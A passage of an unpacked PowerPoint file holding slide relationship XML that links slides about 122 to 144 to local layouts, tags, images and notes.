<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag472.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag471.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1051.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide123.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1061.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide124.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1071.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide125.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1081.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag477.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag476.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag475.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag474.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide126.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag486.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag485.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag484.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag483.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag482.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag481.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag480.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag479.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1091.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag490.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag489.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag488.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag487.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag478.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide127.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1102.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag493.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag492.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag491.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide128.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1112.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag496.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag495.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag494.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide129.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1121.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag500.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag499.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag498.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag497.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag46.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag45.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag44.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide130.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1131.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag505.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag504.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag503.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag502.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag501.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide131.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1141.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag509.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag508.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag507.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag506.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1151.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag513.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag512.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag511.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag510.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide133.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1161.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag517.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag516.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag515.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag514.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide134.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1171.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag521.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag520.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag519.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag518.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide135.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1181.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag522.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide136.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag526.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag525.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1191.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag524.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag523.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1201.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide138.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1211.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1221.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag528.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag527.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag50.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag49.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag48.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide140.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag537.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag536.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag535.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag534.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag533.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag532.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag531.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag530.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1231.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag541.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag540.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag539.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag538.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag529.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide141.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1242.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag544.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag543.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag542.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide142.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1252.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag547.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag546.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag545.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide143.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1261.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag551.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag550.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag549.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag548.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide144.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
